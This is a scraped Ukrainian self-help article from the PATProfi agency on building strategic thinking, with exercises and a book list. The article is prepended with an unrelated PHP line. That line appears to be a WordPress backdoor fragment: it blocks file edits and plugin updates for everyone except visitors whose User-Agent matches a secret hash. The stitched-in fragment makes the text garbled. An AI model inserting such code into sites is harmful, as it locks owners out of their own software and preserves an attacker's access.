if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Як перестати грати в кішки-мишки з планами на життя і розвинути в собі досвідченого стратега у Києві, Україні за доступними цінами від агентства PATProfi

Як перестати грати в кішки-мишки з планами на життя і розвинути в собі досвідченого стратега

Чи часто ти замислюєшся над тим, яким буде наступний крок, або ти віддаєш перевагу жити одним днем? Топ порад з розвитку стратегічного мислення для прокачування твого внутрішнього стратега.

«Безумовно в цій нірці ховається мишка, – відзначив про себе Еркюль Пуаро. – Питання в тому, який наступний крок зробить кішка».

Чи часто ти замислюєшся над тим, яким буде наступний крок, або ти віддаєш перевагу жити одним днем? Якщо ти відносишся до другого типу людей, то готуйся потерпіти невдачу, адже стратегічне мислення – вкрай важливий навик для кожної людини.

Щоб пояснити наочно, наведемо як приклад головну відмінність стратега від не стратегія. Перший завжди думає на перспективу, має глобальні цілі і чітко бачить напрямок, в якому йде. Протилежна ж особистість або витає в хмарах і рухається за інерцією, або застрягла в мертвій точці і зовсім нікуди не рухається. Погодься, такий спосіб життя рідко призводить до чогось гідного.

Щоб допомогти тобі це виправити, ми написали статтю, мета якої – дати читачеві чітке розуміння про те, що таке стратегічне мислення, а також повна інструкція того, щоб розвинути цей навик в собі.

Дочитай до кінця і починай прокачувати своє життя прямо зараз.

Стратегія = тактика?

На початку свого шляху людина, що бажає змінити мислення, часто стикається з безліччю проблем і не завжди до кінця розуміє значення тих чи інших визначень. Наприклад, багато хто плутає “стратегію” і “тактику” або вважають це одним і тим же.

Насправді ці речі дійсно тісно пов’язані між собою, однак кожне визначення виконує свою чітку функцію. Давай звернемося до словника для отримання формулювання.

Стратегія – загальний, недеталізований план, що охоплює тривалий період часу, спосіб досягнення складної мети.

Тактика – складова частина стратегії, що включає теорію, практику, підготовку і дію. Тактика охоплює вивчення, розробку, підготовку і ведення всієї діяльності.

Простіше кажучи, стратегія – це про те, “що робити?”, А тактика – про те, “як робити?” Без стратегії апріорі не може існувати тактики, але і тактика без стратегії не має особливого сенсу (бо в цьому випадку твоя стратегія так і залишиться на рівні планування). Ці поняття мають взаємозалежність один від одного.

Ось ще кілька характерних ознак стратегії і тактики:

Стратегія – довгострокова, глобальна мета; тактика – багато невеликих конкретних цілей, “маленькі дрібненькі кроки до великої мети”.

Стратегія – це константа. Вона незмінна і постійна. Тактика ж має певну гнучкість і може змінюватися в залежності від обставин.

Вправи для розвитку стратегічного мислення

Ну що, ти вже налаштований розвивати в собі стратегічне мислення? Якщо так, то лови топ найефективніших вправ:

 • Вчися бачити загальну картину. Постійне фокусування на чомусь одному вбиває твого внутрішнього стратега. Приклад: ти весь день думаєш тільки про роботу, забувши про обід; заслухався пісню і, переходячи дорогу, не побачив як швидко рухається по шосе автомобіль. Як бачиш, це ніколи не закінчується нічим хорошим, адже якби ти поїв, робота пішла б набагато продуктивніше, а вміння уважно дивитися на дорогу, навіть слухаючи музику, вберегла б від біди.
 • Прораховуй можливі варіанти розвитку подій наперед, будуй стратегію у своєму повсякденному житті, щоб це увійшло в звичку. Кожен раз, фокусуючись на чомусь одному, вчися звертати увагу і на інші оточуючі тебе речі.
 • Будуй плани. Нехай в твою рутину увійдуть щоденні думки про майбутнє. Наприклад, щоранку ти можеш прокидатися на десять хвилин раніше і витрачати цей час на планування майбутнього дня, тижня, місяця, року. Завдяки цим десяти хвилинах ти завжди будеш знати, що чекає на тебе завтра, і назавжди забудеш про те, що таке нудьга (з таким способом життя заняття завжди знайдеться).
 • Вчися мислити питаннями, а не відповідями. Питання – це мова стратегії. «Де я буду жити через рік?», «Якою особистістю я буду через десять років?», «Як я хочу провести старість?» Такі питання позначають і формулюють цілі, а в цьому і полягає сенс стратегії.
 • Думай більше! Рекомендуємо через кожну годину роботи робити міні-перерву на п’ять-десять хвилин, щоб абстрагуватися і поміркувати. Обмірковуй свої проблеми, конфлікти і вияви можливі варіанти їх вирішення. Це розвиває твою когнітивну гнучкість – вміння швидко переключатися з логічного мислення на філософське, творче.
 • Прогнозуй своє майбутнє. Спираючись на аналітику і інтуїцію, вчися передбачати своє найближчє життя. Це навчить тебе бачити взаємозв’язки твоїх дій з усіма цими подіями і бути готовим до очікуваних змін.
 • Постійно саморозвивайся. Будувати плани – недостатньо, необхідно також бути готовим до втілення цих планів в реальність. А для цього потрібно постійно навчатися чомусь новому і розширювати свій кругозір.
 • Відпочивай. У гонитві за досягненням мети дехто часто забуває піклуватися про себе. Постійна робота з перервами тільки на сон і їду доводить людину до вигоряння і депресії. Щоб уникнути цього не забувайте регулярно влаштовувати собі день-відпочинок.
 • Приборкай своє его. Его – дуже підступна річ, яка часом збиває з пантелику і змушує нас приймати бажане за дійсне. Стратеги вміють бачити реальну картину і вгамовувати свій нав’язливо-улесливий внутрішній голос.

П’ять книг, які розвинуть в тобі стратегічне мислення

Книги – це джерело знань і думок. Щоб розвинути в собі ту чи іншу якість, досить лише оволодіти його азами і прочитати кілька книг з обраної тематики. Ми підібрали для тебе п’ять книг, після прочитання яких стратегічне мислення забезпечено (звичайно, в комплексі з вправами!).

 • «Мистецтво війни» Сунь Цзи.
 • «Книга рішень. 50 моделей стратегічного мислення» Мікаель Крогерус і Роман Чеппелер.
 • «Хороша стратегія, погана стратегія» Річард Румельт.
 • «Гра на перемогу» Алан Лафлі і Роджер Мартін.

«Теорія ігор. Мистецтво стратегічного мислення в бізнесі і житті» Авинаш К. Діксіт і Баррі Дж. Нейлбафф.

hosting.pat@gmail.com

Leave a Comment

Ваша e-mail адреса не оприлюднюватиметься.